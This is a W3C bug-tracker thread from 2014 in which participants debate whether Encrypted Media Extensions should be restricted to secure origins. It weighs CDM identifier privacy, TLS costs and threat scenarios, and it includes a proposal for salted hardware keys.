> > advantages when they want to.
> 
> Frankly, this isn't the case of any of the DRM protocols that I've seen. Nor
> do the affordances of message-based encryption protocols, such as Netflix's
> description of their desire for WebCrypto over HTTP, meet the security
> standard expected by UAs (and our constituencies!) for user privacy and
> confidentiality.

But you have not seen them all. And yet you are proposing to restrict all of them based on the subset you have seen. 

> 
> Nor do I think we can argue that a robustly analyzed and audited protocol is
> somehow less desirable than individual vendors' home-grown protocols, for
> which it is a design goal of the product to make it difficult to analyze or
> reason about, and which short of the UAs individually implementing the
> protocol from scratch and auditing it, cannot have any assurances afforded
> even to the UA.

Your assumptions seem to be that all DRM protocols are home-grown and not based on robust well analyzed protocols. You have not offered any proof of this other than your experience. There is no reason that the protocol itself has to be difficult to analyze or reason about, it may just not be public which protocol is being used. This argument seems to be getting back to requiring CDMs to be fully documented. Maybe this conversation should move to that bug (Bug 20944).

> > There is a good writeup on a weakness specific to SSL/TLS here --
> > http://www.thoughtcrime.org/blog/ssl-and-the-future-of-authenticity. 
> > Perhaps ironically, the tightly controlled message-based encryption used by
> > many DRM are not subject to these issues and thus are more secure than SSL
> > in this sense at least.
> 
> I suspect any refutal to this will verge so far off topic that we'll end up
> in the weeds. To the extent that I say I cannot let misinformation stand, I
> would say that the conclusion you reach is not at all supported by the
> article. Among the many reasons that this is, consider the most simplest
> response this: The public can audit the behaviour of CAs, and CAs business
> interests are aligned with promoting security (as the alternative is
> obsolence). The public CANNOT audit CDMs (as has been repeatedly established
> here that this be the outcome, even if the spec allows for hypothetically
> audited CDMs), and the business interests of CDMs is inherently geared
> towards creating a model of "too big to fail" (i.e. that they're an
> inextricable part of certain large media streaming sites, and as such, no UA
> can effectively disable or reject the CDM, for fear of breaking the
> experience for the users).
> 
> The rest we can save for a separate discussion in another forum, if it
> should somehow becomes necessary to show how a singular monolithic and
> opaque entity is worse than a diverse and robust competitive space with
> public audits and transparency.

Nice. You try to refute the argument and then say "let's take this elsewhere" implying I would be churlish to respond. Well played sir. 

I am sure when you read the article you realized the implication is that the public CANNOT audit the behavior of CAs to any reasonable degree. And what is worse, even when those CA's have been proven to be bad actors, we can't always move away from them because they are indeed "too big to fail".
Comment 65 Joe Steele 2014-08-21 23:30:45 UTC
(In reply to David Dorwin from comment #63)
> (In reply to Mark Watson from comment #59)
> > I know. Let me take a step back. Attacks #1 and #2 are not mitigated by
> > secure origin. Other mitigations as outlined in the privacy section need to
> > be in place.
> > 
> > What I said was - assuming those mitigations are in place - then what's left
> > of attacks #5 and #6 is no worse with EME than it is without EME.
> > Specifically, I did not compare non-clearable identifiers to fingerprinting
> > / local storage, I compared clearable, origin-specific, identifiers to those
> > things.
> 
> Are you arguing for possible option 2 or 3 in comment #0 or that we should
> normatively require the mitigations for attacks #1 and #2? The former still
> requires that Netflix and others support HTTPS for some of their traffic.
> The latter is not possible with many current DRM implementations (so you
> have the same transition issue).

I am curious. Why do you think it is not possible with many current DRM implementations? I certainly think it is less efficient and not needed in some cases, but "not possible" implies the DRM must control the channel. I think a DRM with such a restriction would find it hard to operate as a CDM with or without this restriction. Did you have a specific DRM in mind?
Comment 66 David Dorwin 2014-08-22 00:53:20 UTC
(In reply to Joe Steele from comment #65)
> (In reply to David Dorwin from comment #63)
> > (In reply to Mark Watson from comment #59)
> > > I know. Let me take a step back. Attacks #1 and #2 are not mitigated by
> > > secure origin. Other mitigations as outlined in the privacy section need to
> > > be in place.
> > > 
> > > What I said was - assuming those mitigations are in place - then what's left
> > > of attacks #5 and #6 is no worse with EME than it is without EME.
> > > Specifically, I did not compare non-clearable identifiers to fingerprinting
> > > / local storage, I compared clearable, origin-specific, identifiers to those
> > > things.
> > 
> > Are you arguing for possible option 2 or 3 in comment #0 or that we should
> > normatively require the mitigations for attacks #1 and #2? The former still
> > requires that Netflix and others support HTTPS for some of their traffic.
> > The latter is not possible with many current DRM implementations (so you
> > have the same transition issue).
> 
> I am curious. Why do you think it is not possible with many current DRM
> implementations? I certainly think it is less efficient and not needed in
> some cases, but "not possible" implies the DRM must control the channel. I
> think a DRM with such a restriction would find it hard to operate as a CDM
> with or without this restriction. Did you have a specific DRM in mind?

See the mitigations in comment #52. Note that I said *implementations*, not systems or protocols. It's certainly possible to add such mitigations to an implementation, but it might require platform upgrades in some cases. If that is required, there are a lot of other interoperability issues that can also be addressed.
Comment 67 Glenn Adams 2014-08-22 02:22:45 UTC
(In reply to Ryan Sleevi from comment #61)
> Your CDM does not have a network connection
> (normatively), it defers to the UA to mediate all key exchanges.

From what normative text do you derive this statement?
Comment 68 Ryan Sleevi 2014-08-22 03:56:34 UTC
(In reply to Joe Steele from comment #64)
> None of this efficiency makes any difference in this case. The CDM is
> constructing the request - which in our case is a single packet. The
> application can use any mechanism to send it it likes, but HTTP is good
> enough in our case and quite efficient. TLS would be overkill and not add
> anything to the security. 

You cannot have your cake and eat it to. You just described the overhead as being one packet in, one packet out, but that's clearly not the case. Just because the CDM constructs the request does not require, as you incorrectly suggested, that a UA establish a new connection.

Note that you're also firm in the territory of non-guaranteed behaviour when you say "HTTP is good enough in our case". One, UAs can and will disagree with that assertion for *your* protocol, and two, not all CDMs may be able to implement that.

In the absence of hard guarantees about the security properties, requiring TLS is to ensure that even at a baseline, the security properties are the minimal acceptable level, and in a way that's consistently implemented (ergo, interorperable)

> I do not mean that. I am referring to the latency that will result from the
> CDN delivering the media stream having to re-encrypt each media segment for
> delivery.

And, as the IETF UTA WG has shown, that latency is effectively non-existant in the whole.

> No. The overhead in my case in particular is large if TLS is used. Less with
> the better algorithms described in that document, but still large relative
> to using HTTP. 

And yet the real world evidence - and the draft mentioned - show this is a claim without merit or fact. You can keep repeating it, but it doesn't make it any more true.

> But you have not seen them all. And yet you are proposing to restrict all of
> them based on the subset you have seen. 

Correct. The fact that most of what we've seen - from members of active in this very discussion - is that it fails to meet the minimum bar of security. That a hypothetical CDM might exist which preserves privacy sufficiently is an interesting theorhetical discussion, but the practical reality is few do, and, more importantly for this discussion, have no such guarantees or requirements of continuing to do so.

Because, as Glenn so decisively puts, that this WG will not, in any way shape or form, place any such requirements that the CDMs implement such basic levels of security, it becomes necessary to place requirements on how CDMs are used, since we cannot place requirements on the CDMs themselves. 


> Your assumptions seem to be that all DRM protocols are home-grown and not
> based on robust well analyzed protocols. You have not offered any proof of
> this other than your experience. 

The proof is in the very fact that Mark Watson has repeatedly told the W3C in a variety of forums that the protocols employed CANNOT be discussed in an open context.

If they could, we would and could have a unified CDM architecture and stop faffing about with different licensing protocols.

This inherent opaqueness is a formal guarantee that there lacks the body of evidence. If you want to establish that the DRM protocols employed by CDMs - the ones that have significant access to long-term tracking identifiers and which, in the vast majority, actively employ them without any of the mitigations *suggested* in this document, then I think the burden of proof rests solely with you.

> Nice. You try to refute the argument and then say "let's take this
> elsewhere" implying I would be churlish to respond. Well played sir. 
> 
> I am sure when you read the article you realized the implication is that the
> public CANNOT audit the behavior of CAs to any reasonable degree. And what
> is worse, even when those CA's have been proven to be bad actors, we can't
> always move away from them because they are indeed "too big to fail".

I'm saying that a discussion of the CA ecosystem is entirely inappropriate for this bug. That you're using this as a means to divert the discussion from the more tangible and real security aspects is extremely unfortunate, but equally inappropriate.

I'm more than happy to describe to you exactly how the world that Moxie described THREE YEARS AGO is not at all the world we live in, nor the world we will, but this bug is an entirely inappropriate forum and venue for it. I'm not at all casually dismissing Moxie's argument - I think there were many apt observations. But those were old observations that barely held then and certainly do not hold now, so referring to them as somehow proof that TLS is insecure is simply incorrect.

(In reply to Glenn Adams from comment #67)
> (In reply to Ryan Sleevi from comment #61)
> > Your CDM does not have a network connection
> > (normatively), it defers to the UA to mediate all key exchanges.
> 
> From what normative text do you derive this statement?

Merely that CDMs are not normatively guaranteed to have a network connection, not that they are normatively prevented from having one (though they should be, and in practical implementations, are).

They are, however, normatively guaranteed to have a means of having the UA act on their behalf with respect to the key exchange.
Comment 69 Mark Watson 2014-08-22 14:26:11 UTC
(In reply to Ryan Sleevi from comment #68)
> (In reply to Joe Steele from comment #64)

> > Your assumptions seem to be that all DRM protocols are home-grown and not
> > based on robust well analyzed protocols. You have not offered any proof of
> > this other than your experience. 
> 
> The proof is in the very fact that Mark Watson has repeatedly told the W3C
> in a variety of forums that the protocols employed CANNOT be discussed in an
> open context.
> 

I don't recall saying that even once, never mind repeatedly.

It's quite likely I have pointed out the fact that none of the proprietary DRM vendors have published their protools. As Joe points out, this doesn't mean they are not using open standard protocols and open, well-reviewed, implementations, just that we don't know what they are using because they have not told us.

However, UA implementors that integrate CDMs may well know these things for the CDMs they integrate and should be able to make their own security decisions on that basis.

Furthermore, UA implementors that properly sandbox the CDM will know what kind of identifiers it has access to as well as what it does with them.
Comment 70 Henri Sivonen 2014-08-22 14:43:38 UTC
(In reply to David Dorwin from comment #52)
> 7) A non-EME-using site (i.e. no reason to use protected media), ad network,
> etc. uses EME to obtain a "permanent" identifier.

Yeah, it makes sense to separate out the case where an ad network uses EME only for tracking and not to satisfy licensing requirements for movies / TV series / music.

Also, I failed to list the concern you pointed towards in comment 36: An attacker giving maliciously crafted input to a non-sandboxed CDM whose bugginess level the browser vendor can't control (or even assess) in order to exploit bugs (buffer overflows and the like in the CDM).

These concerns differ from the previous ones, because they relate to exploiting bugs in implemenation of the DRM instead of exploiting the design of the Key System protocol or its key provisisioning practices.

I think it makes sense to break this into eight subcases:

8) A malicious site that manages to get the user to navigate to it without manipulating network traffic of another site sends maliciously crafted EME messages to the CDM in order to exploit bugs in the Key System protocol implementation in the CDM to run shell code.

9) A malicious site that manages to get the user to navigate to it without manipulating network traffic of another site sends maliciously crafted PSSH boxes to the CDM in order in order to exploit bugs in the Key System protocol implementation in the CDM to run shell code.

10) A malicious site that manages to get the user to navigate to it without manipulating network traffic of another site sends maliciously media data to the CDM in order to exploit bugs in the decryption code of the CDM (or if the CDM subsumes more functionality than it logically has to, in code that processes the media file prior to decryption) to run shell code.

11) A malicious site that manages to get the user to navigate to it without manipulating network traffic of another site sends maliciously crafted encrypted media data to the CDM in order to exploit bugs in the post-decryption decoding (codec) code of the CDM to run shell code.

12) An active network attacker injects EME usage into the traffic of a site to send maliciously crafted EME messages to the CDM in order to exploit bugs in the Key System protocol implementation in the CDM to run shell code.

13) An active network attacker injects maliciously crafted PSSH boxes to media data in order in order to exploit bugs in the Key System protocol implementation in the CDM to run shell code.

14) An active network attacker injects maliciously crafted encrypted media data to the CDM in order to exploit bugs in the decryption code of the CDM (or if the CDM subsumes more functionality than it logically has to, in code that processes the media file prior to decryption) to run shell code.

15) An active network attacker injects maliciously crafted encrypted media data to the CDM  in order to exploit bugs in the post-decryption decoding (codec) code of the CDM to run shell code.

Sandboxing would address all of these, but the issue is what can be done with unsandboxed platform CDMs that the browser vendor can't control (or even assess).

Restricting EME to secure origins wouldn't address attacks #8...#11. They could be addressed by maintaining (possibly by asking the user) a list of origins that are allowed to use EME because they are trusted not to try to exploit bugs in the CDM. Attack modifications to bypass the allow-list would basically be attacks #12...#15, which could then be addressed by requiring secure origins.

Restricting EME to secure origins and blocking mixed-content XHR and Web Sockets would address attack #12. It would also address attack #13 when initialization data is carried outside the media files. However, unless passive mixed-content is blocked, too, requiring a secure origin for the EME-using application would not address attacks #13...#15, since the media file could still be loaded form insecure origins.

Requiring secure origins even for the media files would address attacks #13...#15, but judging from the comments on this bug, that sort of requirements seems to be considered particularly infeasible.

Attacks #13 and #9 could be addressed by limiting the PSSH boxes to such (unencrypted) formats that can be validated by the browser (analogously to browsers validating WebGL shaders before passing them to a shader compiler whose bugs aren't under the control of the browser vendor).

Attacks #14 and #10 could be addressed by making sure that the CDM doesn't subsume any functionality that it logically does not need to (e.g. does not perform MP4 demultiplexing) and then making the leap of faith that the AES-CTR decryption step is narrow enough to be bug-free.

Attacks #15 and #11 could be addressed by performing cryptographic integrity checking as part of the decryption step, but as I understand it (please correct me if I'm wrong; I don't have the CENC spec at hand) neither WebM encryption nor CENC in MP4 involve MAC checking leaving the formats vulnerable to CTR malleability attacks. This means that an attacker who gets to replace data in a media file can at least fuzz the codecs with random data, which might not be enough for exploit development. However, to the extent there are parts of the codec data whose plaintext in a particular position is known or guessable and the codec implementation has a bug that can be exploited by manipulating data at that position, it is possible for the attacker to manipulate the data that way. Hopefully, there's the mitigating factor that since the codec data is supposed to be *compressed*, runs of data whose plaintext is known hopefully aren't long enough to hold shell code. Switching away from CENC to add integrity checking seems too drastic in terms of the compatibility properties that EME seeks.

However, attacks #15 and #11 are CDM-specific attack surface only if the codec implementation is CDM-specific. If the browser uses the same platform codec implementation in non-DRM cases, bugs in the codec can be exploited without EME (unless the browser validates all data before passing it to the codec in the case where the data is not encrypted, but that seems unlikely due to performance reasons).

(In reply to Mark Watson from comment #50)
> Commercial CDNs charge significantly more for HTTPS services than HTTP.
> Migrating a large amount of traffic from HTTP to HTTPS has significant
> capacity / re-engineering implications. There are also operational issues
> that negatively impact user experience. So it's a significant issue.

The largest chunk of traffic is the media data, which is "passive mixed content" if embedded from an insecure origin into a page coming from a secure origin. In the comment of mine that you are replying to, I intentionally mentioned blocking mixed-content XHR and Web Sockets but didn't mention blocking mixed-content media data. When assessing the feasibility of restricting EME to secure origins, requiring the EME-using script to run in the context of a secure origin and the key acquisitions to happen with a secure origin is one thing and making all the media data come from secure origins, too, is another thing.

(In reply to Mark Watson from comment #59)
> even though the technical rationale is weak / restricted to
> CDMs that do not follow the privacy / security mitigations in the document
> (but nevertheless somehow get themselves integrated into a UA).

Suppose someone seeks to make a browser with the level of care to privacy that the members of the Chrome team show here for a device has a CDM for a Netflix-supported Key System but the device instance-specific CDM keys are factory-provisioned and unchangeable as a consequence of a higher-than-desktop robustness solution. Assuming that Netflix continues to serve the application from an insecure origin to desktop browsers would Netflix serve the application from a secure origin just to such a browser if requested by the browser maker or leave it up to the browser maker to get the CDM implementation and the manufacturing flow changed if better privacy properties are desired?

That is, how realistic is it, really, for the secure origin requirement to be contextual to a particular CDM implementation? It seems to me that unless major desktop browsers restrict EME to secure origins, browsers on devices with different CDM identifier stickiness characteristics aren't in a position where they could demand different treatment (i.e. to be served from secure origins only).

(In reply to Joe Steele from comment #60)
> The key requests made by some DRMs fall exactly into this category of "very
> short connections". One packet out, one packet in. The overhead of
> negotiating an SSL channel (which may ultimately add nothing to the
> security) can be almost 100%.

Not necessarily if the key requests get multiplexed into a pre-existing SPDY/HTTP2 connection that's open to the server where either the HTML page already came from, which is quite possible when the key requests go over XHR and go to an application server in front of the actual key server so that the application server can check cookies.
Comment 71 Henri Sivonen 2014-08-23 07:50:54 UTC
(In reply to Henri Sivonen from comment #70)
> (In reply to David Dorwin from comment #52)
> > 7) A non-EME-using site (i.e. no reason to use protected media), ad network,
> > etc. uses EME to obtain a "permanent" identifier.
> 
> Yeah, it makes sense to separate out the case where an ad network uses EME
> only for tracking and not to satisfy licensing requirements for movies / TV
> series / music.

I somehow failed to mention:

I've advocated that we address attack #7 by partitioning the browser-provided salt (see the mitigation for attack #2) not just by the origin using EME but by the combination of the origin using EME and the origin of the top-level browsing context.

That is, if site A provides EME-using iframes for sites B an C, it sees a different CDM identity when iframed by B compared to when iframed by C.
Comment 72 Henri Sivonen 2014-08-23 13:24:20 UTC
(In reply to Henri Sivonen from comment #70)
> The largest chunk of traffic is the media data, which is "passive mixed
> content" if embedded from an insecure origin into a page coming from a
> secure origin.

Oops. That's not the case with MSE+XHR. Indeed, it's pretty big change if as a side effect of MSE use, the media segments end up having to come from a secure origin in addition to the application code and the key acquisition being restricted to secure origins.
Comment 73 Ryan Sleevi 2014-08-25 04:18:27 UTC
(In reply to Henri Sivonen from comment #72)
> (In reply to Henri Sivonen from comment #70)
> > The largest chunk of traffic is the media data, which is "passive mixed
> > content" if embedded from an insecure origin into a page coming from a
> > secure origin.
> 
> Oops. That's not the case with MSE+XHR. Indeed, it's pretty big change if as
> a side effect of MSE use, the media segments end up having to come from a
> secure origin in addition to the application code and the key acquisition
> being restricted to secure origins.

Considering that the majority of UAs already restrict XHRs as active mixed content (FF, IE, Chrome), I think this is a given, and not a change but the norm.

Still, I don't think that media content necessarily means it's not a privacy risk, considering the relationship of media content to the licensing itself - even if it's not directly tied to key acquisition.
Comment 74 Henri Sivonen 2014-08-25 09:24:41 UTC
(In reply to Ryan Sleevi from comment #73)
> Still, I don't think that media content necessarily means it's not a privacy
> risk

Sure, it's a privacy risk in the sense of revealing what content you watch, but it's not a risk in the sense of revealing a device-bound CDM ID.
Comment 75 Joe Steele 2014-08-25 16:03:02 UTC
(In reply to Henri Sivonen from comment #70)
> (In reply to Joe Steele from comment #60)
> > The key requests made by some DRMs fall exactly into this category of "very
> > short connections". One packet out, one packet in. The overhead of
> > negotiating an SSL channel (which may ultimately add nothing to the
> > security) can be almost 100%.
> 
> Not necessarily if the key requests get multiplexed into a pre-existing
> SPDY/HTTP2 connection that's open to the server where either the HTML page
> already came from, which is quite possible when the key requests go over XHR
> and go to an application server in front of the actual key server so that
> the application server can check cookies.

Most small to medium size content publishing companies do not want the hassle of running their own license servers (especially multiple of them). They will either choose to use services provided directly by the DRM vendor or those of an OVP like Brightcove who provide all the endpoints. In the either case, the license server is not likely to be running on the same server the application is being served from. However the large companies who run their own license servers are also the ones who would most benefit from this optimization. It would be good to have feedback from big content publishers (e.g. Youtube, Amazon, Comcast to name a few).


(In reply to Ryan Sleevi from comment #68)
> (In reply to Joe Steele from comment #64)
> > None of this efficiency makes any difference in this case. The CDM is
> > constructing the request - which in our case is a single packet. The
> > application can use any mechanism to send it it likes, but HTTP is good
> > enough in our case and quite efficient. TLS would be overkill and not add
> > anything to the security. 
> 
> You cannot have your cake and eat it to. You just described the overhead as
> being one packet in, one packet out, but that's clearly not the case. Just
> because the CDM constructs the request does not require, as you incorrectly
> suggested, that a UA establish a new connection.
> 
> Note that you're also firm in the territory of non-guaranteed behaviour when
> you say "HTTP is good enough in our case". One, UAs can and will disagree
> with that assertion for *your* protocol, and two, not all CDMs may be able
> to implement that.
> 
> In the absence of hard guarantees about the security properties, requiring
> TLS is to ensure that even at a baseline, the security properties are the
> minimal acceptable level, and in a way that's consistently implemented
> (ergo, interorperable)

I think it's fairly clear at this point that we are not going to convince each other. However I am willing to stipulate that requiring openssl for the application download would be really good thing. I am also willing to stipulate that requiring it for the key exchange is not a bad thing. It may not add anything to privacy in some cases, but if it makes the APIs more palatable I am not opposed. I am not convinced that requiring it for the media APIs is a good idea - which is what this will effectively do as far as I can tell. 

We have one large content publisher commenting that this will be a problem. We need more feedback from others content publishers. 

Ryan/David can you reach out for comment to the folks who work on YouTube and get their feedback here? 

Anticipating that the rest of the feedback from content publishers will be negative, is there any way we can mitigate the mixed-content problem?
Comment 76 Ryan Sleevi 2014-08-25 16:36:38 UTC
(In reply to Henri Sivonen from comment #74)
> (In reply to Ryan Sleevi from comment #73)
> > Still, I don't think that media content necessarily means it's not a privacy
> > risk
> 
> Sure, it's a privacy risk in the sense of revealing what content you watch,
> but it's not a risk in the sense of revealing a device-bound CDM ID.

Well, no, that's not guaranteed, certainly not by the spec.

Again, this is dependent upon the CDM, and which I think there will continue to be disagreement as to how much or how little a UA can ensure it's privacy goals are met when negotiating with CDMs and content providers.

Consider a particular media file that is encrypted with a Key that only User A can obtain (from the license server). Even if User A is presented to the site as some salted (potentially cleared) data, the site can still employ the CDM/licensing mechanism to track the user, since only the User A is authorized to view.

A hostile intermediate could thus substitute a legitimate file with such a file and discover that the user is indeed User A.

Or, depending again upon the CDM implementation and protection mechanisms employed, a hostile intermediate might be able to craft a hostile media file that causes the user to talk to the license server iff they are User A, but not User B.  There, again, even if the CDM/License communication is TLS protected, the ability to inject the media represents a side-channel attack on user privacy.
Comment 77 David Dorwin 2014-09-17 19:55:48 UTC
(In reply to Henri Sivonen from comment #70)
I filed bug 26838 to address some of the vulnerabilities related to initData - specifically attacks #13-15.
Comment 78 Domenic Denicola 2014-09-17 20:59:28 UTC
Hi all,

I saw on the public-html-media list that this bug was hoping for input from a wider variety of stakeholders. Let me say that the TAG is strongly in favor of requiring secure origins for any code that interacts with the CDM.

We are working on a formal statement of the various architectural concerns and guiding principles the TAG hopes can be applied to EME [1], which is still undergoing revision and progress and shouldn't really be taken as final yet. But I can say with confidence that we all agree requiring secure origins for CDM-using code is extremely important for security, and that part will not change. See the section at [2] for more details.

[1]: https://github.com/w3ctag/eme/blob/master/EME%20Opinion.md
[2]: https://github.com/w3ctag/eme/blob/master/EME%20Opinion.md#user-facing-concerns
Comment 79 Henri Sivonen 2014-09-18 08:47:32 UTC
(In reply to David Dorwin from comment #77)
> (In reply to Henri Sivonen from comment #70)
> I filed bug 26838 to address some of the vulnerabilities related to initData
> - specifically attacks #13-15.

Thanks.

Regarding earlier concerns about hardware CDMs projecting constant identifiers, it's worth noting that it should be possible to have a hardware CDM with identifier salting even without server-based individualization. That is, addressing the persistent network-exposed identifier problem and the desire to have a hardware CDM that doesn't need supporting individualization server infrastructure after the secrets have been provisioned at the factory are not mutually exclusive.

Here's how:

At the factory, instead of provisioning a per-device instance key (or key pair), provision a per-device instance seed. The seed is just some number (e.g. 128 or 256) of randomly-generated (individually for each device-instance) bits that are embedded in the hardware at the factory. That is, each device instance ends up with a unique (except for extremely improbable collisions) seed that's persistent through the lifetime of the device instance. Let's call this the Device Seed.

Additionally, embed a signing key (RSA, (EC)DSA, Ed25519 or similar), let's call this the Anonymity Set Private Key, into the hardware of multiple device instances. A single Anonymity Set Private Key could be used for all device instances of the same device model or even all device instances of different device models that have the same hardware CDM implementation. The more device instances have the same Anonymity Set Private Key, the better for user privacy, but the more device instances have the same Anonymity Set Private Key, the bigger a DRM robustness problem the compromise of that key becomes.

Embedding the Device Seed and the Anonymity Set Private Key is to be done in a manner that makes it very difficult for these secrets to be extracted from the hardware.

The public key corresponding to the Anonymity Set Private Key, let's call it the Anonymity Set Public Key,is certified (signed) by the root of trust of the DRM scheme (Key System) or by an intermediate key whose certification chains to the root of trust of the DRM scheme. That is, certifications (key signing) performed with the Anonymity Set Privace Key can be verified by Key Servers to chain to the root of trust of the DRM scheme. Alternatively, each key server could have a collection of all the different Anonymity Set Public Keys in circulation to be able to check if a signature is made by a valid Anonymity Set Public Key. This way, there is no need for chaining certifications (signatures) to a root of trust. (Either way, there's a need to distribute information about revoked keys to the key servers, so the system might as well distribute a list of valid keys and omit the PKI hierarchy.)

At runtime, the hardware CDM receives a salt from the browser. Let's call this the Salt. (The CDM doesn't need to know how the salt is generated, but a reasonable policy is for the browser to randomly generate, and then remember until the user asks it to be forgotten, a salt for each combination of EME-using origin and the top-level origin.) The hardware CDM then combines the Device Seed and the Salt to form a Salted Seed. The combination function needs to be deterministic. It could be simply XOR (if the key system never lets the browser see a value that could be reversed to the Salted Seed). It could also be hashing the concatenation of the Salt and the Device Seed (or the Device Seed and the Salt).

The hardware CDM then generates a key to be used for key acquisition. Let's call this a Salted CDM Key. This key could be a secret symmetric key (e.g. AES key), in which case it needs to be encrypted for the key server when sending it over. (If the Salted CDM Key is encrypted for the key server, the browser doesn't see it, so in the simplest case, the function for combining the Device Seed and the Salt could be XOR and the Salted Seed could be Salted CDM Key directly.) Alternatively, the Salted CDM Key could be an RSA public key (of the generated key pair), in which case the Salted Seed would be used as the seed for a CSPRNG used in RSA key generation. Alternatively, the Salted Seed could be converted to an elliptic curve point using Elligator and the Salted CDM Key could be an elliptic-curve Diffie–Hellman public key (of the generated key pair). Or the Salted CDM Key could be derived from the Salted Seed using some other deterministic mechanism.

The CDM then signs the Salted CDM Key using the Anonymity Set Private Key. This signature is sent to the key server so that when the CDM performs key acquisition advertising the Salted CDM Key to the key server, the key server can convince itself that the Salted CDM Key belongs to a CDM that meets the applicable robustness and compliance rules (since it possesses a Anonymity Set Private Key whose corresponding Anonymity Set Public Key the key server considers valid). The content keys are sent by the key server to the CDM by using encryption that involved the Salted CDM Key (encrypted using the Salted CDM Key if it is a symmetric key or an RSA public key or encrypted using a shared secret derived from the Salted CDM Key if it is an (EC)DH public key, etc.)

For maximum robustness, all the above should happen in tamper-resistent hardware, but to trade off some robustness to gain ease of implementation, any of the above steps could instead be performed in software (normal or inside a TEE).

The notable characteritics are:
 1) The Salted CDM Key is bound to the hardware-bound Device Seed for anti-cloneablity.
 2) If the Salt changes, a key server can't correlate the previous Salted CDM Key and the new Salted CDM Key with each other beyond both belonging to devices with the same Anonymity Set Private Key.
 3) The Anonymity Set Private Key enables on-device certification of Salted CDM Keys, so there's no need for server-based individualization.

Inferring PlayReady design from the Defined Terms for Microsoft PlayReady Compliance Rules and Robustness Rules, it seems to me this could be applied to the existing PlayReady key system by making the Anonymity Set Private Key and Anonymity Set Public Key correspond to Device Model Keys and by making the Salted CDM Key correspond to the Device Public Key.
Comment 80 Joe Steele 2014-09-23 14:54:09 UTC
Henri, this is a great writeup of a potential key delivery mechanism. I am confused though about your intent. Are you proposing that this be a mandated mechanism? Or is this being presented as an example of a key delivery architecture that would not require secure origins?
Comment 81 Henri Sivonen 2014-10-06 10:06:02 UTC
(In reply to Joe Steele from comment #80)
> Henri, this is a great writeup of a potential key delivery mechanism. I am
> confused though about your intent. Are you proposing that this be a mandated
> mechanism? Or is this being presented as an example of a key delivery
> architecture that would not require secure origins?

It shows how a key concern behind the proposal to require an authenticated origin *could* be addressed even in hardware without external dependencies (like ongoing maintenance of individualization server infrastructure to support already-shipped devices). While I wish it could be mandated, so far the Task Force has been shy to normatively require the DRM to have particular characteristics, so I don't have my hopes high for *mandating* stuff. I think the writeup could be used as input to make the suggestions in the Privacy Considerations section more detailed, though.
Comment 82 David Dorwin 2014-10-15 20:51:49 UTC
Unless or until EME normatively requires identifier protection, clearability of identifiers, sandboxing of CDMs, and/or other solutions/mitigations*, we are in a situation where some implementations will be deeply concerning in the areas of privacy and security. The TAG has expressed concern about the security and privacy implications of CDMs, especially on non-secure origins [1].

That leaves us in the situation I described in comment #0: although some implementations may address or mitigate the issues, others will not. The only way to ensure implementations do the right thing *without fragmenting the web platform* is to require secure origins for all implementations.

The remaining question is how to facilitate a smooth transition by content providers that use MSE and thus cannot use mixed content in many user agents.

* Even some mitigations, such as user permissions, are exploitable when using HTTP origins.

[1]: https://github.com/w3ctag/spec-reviews/blob/master/2014/10/eme.md#user-facing-concerns
Comment 83 Bob Lund 2014-10-15 21:22:52 UTC
(In reply to David Dorwin from comment #82)
> Unless or until EME normatively requires identifier protection, clearability
> of identifiers, sandboxing of CDMs, and/or other solutions/mitigations*, we
> are in a situation where some implementations will be deeply concerning in
> the areas of privacy and security. The TAG has expressed concern about the
> security and privacy implications of CDMs, especially on non-secure origins
> [1].
> 
> That leaves us in the situation I described in comment #0: although some
> implementations may address or mitigate the issues, others will not. The
> only way to ensure implementations do the right thing *without fragmenting
> the web platform* is to require secure origins for all implementations.

Wouldn't another alternative be a normative requirement that requests from CDM are encrypted?

> 
> The remaining question is how to facilitate a smooth transition by content
> providers that use MSE and thus cannot use mixed content in many user agents.
> 
> * Even some mitigations, such as user permissions, are exploitable when
> using HTTP origins.
> 
> [1]:
> https://github.com/w3ctag/spec-reviews/blob/master/2014/10/eme.md#user-
> facing-concerns
Comment 84 Joe Steele 2014-10-15 22:00:47 UTC
> Wouldn't another alternative be a normative requirement that requests from
> CDM are encrypted?

With the exception of ClearKey.
Comment 85 David Dorwin 2014-10-15 22:06:55 UTC
(In reply to Bob Lund from comment #83)
> Wouldn't another alternative be a normative requirement that requests from
> CDM are encrypted?

That would be a form of identifier protection, but that can only hope to address a subset of privacy-related concerns. Also, such a requirement would need to be very detailed and prescriptive to ensure the appropriate privacy properties.
Comment 86 Mark Watson 2014-10-16 00:42:45 UTC
This thread, the TAG opinion and David's comment#82 all reflect the fact that there are multiple ways to address the privacy and security risks that have been raised.

We could add additional normative requirements to the specification, though this requires some discussion and may not solve all problems. We could require secure origins, though this also requires some discussion - including of the mixed content problem - and still may not solve all problems.

There may also be some middle ground, where a secure origin is required conditionally, depending on the properties of the CDM.

In practice, in many cases, the CDM and UA implementors together can address the issues raised here without secure origins. In these cases they should not be forced to anyway require a secure origin, given the high cost of such a requirement on content providers.

We could even simply strengthen our security requirements by enumerating the issues and mitigations (including but not limited to secure origins) and requiring that implementations MUST address these: this would already be more than the rest of the web platform - any implementation could have buffer overrun vulnerabilities, for example, and we do not specify how browsers should address this security aspect - we just assume that they do.
Comment 87 Anne 2014-10-16 06:55:18 UTC
(In reply to Mark Watson from comment #86)
> given the high cost of such a requirement on content providers.

I believe this is still under "citation needed". Clearly there are content providers that have managed. With the evolution of HTTP and other new platform features it also seems increasingly unlikely you can avoid the requirement for any serious application.
Comment 88 Mark Watson 2014-10-16 14:52:49 UTC
(In reply to Anne from comment #87)
> (In reply to Mark Watson from comment #86)
> > given the high cost of such a requirement on content providers.
> 
> I believe this is still under "citation needed". Clearly there are content
> providers that have managed. With the evolution of HTTP and other new
> platform features it also seems increasingly unlikely you can avoid the
> requirement for any serious application.

We are running some capacity tests and I will share some figures from those soon. Suffice to say, for the moment, that the costs associated with simply enabling HTTPS are very significant. A managed migration, at a reasonable pace with time for software and hardware optimizations to be developed and deployed, has a different, lower, cost.

Also, HTTPS is not a panacea and we are looking at - and in some contexts have deployed - other approaches as well.
Comment 89 Joe Steele 2014-10-16 16:28:48 UTC
(In reply to Mark Watson from comment #86)
> We could even simply strengthen our security requirements by enumerating the
> issues and mitigations (including but not limited to secure origins) and
> requiring that implementations MUST address these: this would already be
> more than the rest of the web platform - any implementation could have
> buffer overrun vulnerabilities, for example, and we do not specify how
> browsers should address this security aspect - we just assume that they do.

I agree. 

